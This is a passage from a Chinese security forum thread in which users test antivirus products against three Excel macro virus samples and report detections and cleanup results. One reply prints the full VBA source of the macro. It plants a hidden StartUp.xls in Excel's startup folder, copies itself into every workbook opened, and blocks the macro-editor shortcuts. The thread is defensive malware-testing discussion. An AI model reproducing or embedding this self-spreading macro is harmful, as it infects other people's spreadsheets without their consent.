楼主: vm001
收起左侧

[病毒样本] 宏病毒3例测试

  [复制链接]
寒山竹语
发表于 2012-9-29 08:47:07 | 显示全部楼层
qzmxy2006 发表于 2012-9-28 23:24
黑屏了么。。

这类样本不黑屏的。
zpforyou
发表于 2012-9-29 10:54:59 | 显示全部楼层
downed it
284678343
发表于 2012-9-29 10:59:58 | 显示全部楼层
本帖最后由 284678343 于 2012-9-29 11:21 编辑
  1. 黄骅港供电工队2012年10月接触网检修计划报表.xls        Virus.MSExcel.Laroux.jm        已删除        2012/09/29 星期六 11:20:37        C:\Users\Chobits\Virus\       
  2. 黄骅港供电工队2012年09月接触网月报表.xls        Virus.MSExcel.Laroux.jm        已删除        2012/09/29 星期六 11:20:37        C:\Users\Chobits\Virus\       
  3. 黄骅港供电工队2012年09月接触网检修完成报表.xls        Virus.MSExcel.Laroux.jm        已删除        2012/09/29 星期六 11:20:33        C:\Users\Chobits\Virus\       
复制代码
村支部书记
发表于 2012-9-29 11:55:36 | 显示全部楼层
comodo行不行啊,谁测试一下
colorama
发表于 2012-9-29 12:53:59 | 显示全部楼层
vm001 发表于 2012-9-28 16:09
看来你开了红伞引擎

不好意思,没开红伞引擎。
784696777
发表于 2012-9-29 17:30:42 | 显示全部楼层
毒霸双击后拦截
zhousulin5
发表于 2012-9-29 20:45:59 | 显示全部楼层
本帖最后由 zhousulin5 于 2012-9-29 21:20 编辑

这个宏很温柔的样子。至少在禁用宏的情况下可以打开文件。

Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    End If
    End Sub

附手工删除宏后的文件,virustotal检查结果:SHA256:         7cf6a7ee40ce56711c62201492ebf1c4022bbbd56611f4cd2aec70be982f03fb
File name:         手工删宏后.rar
Detection ratio:         0 / 42
Analysis date:         2012-09-29 12:51:53 UTC ( 0 分钟 ago )



吐槽一下,virscan咋那么慢啊,人virustotal都查完五个了,它一个才84%。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qpzmggg999
发表于 2012-9-29 21:06:49 | 显示全部楼层
寒山竹语 发表于 2012-9-28 13:52
美系三大应该都可以修复的。我一看趋势成功修复三个,就知道那两家也一定可以了。

咖啡全部修复
七少
发表于 2012-9-29 21:45:18 | 显示全部楼层
我没安装office 我说费尔怎么没反应了
小飞侠.net
发表于 2012-9-30 20:04:51 | 显示全部楼层
试一下:360杀毒4.0.13093A同样也不能完美清除,确认是删除的说!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-6-3 00:36 , Processed in 0.097340 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表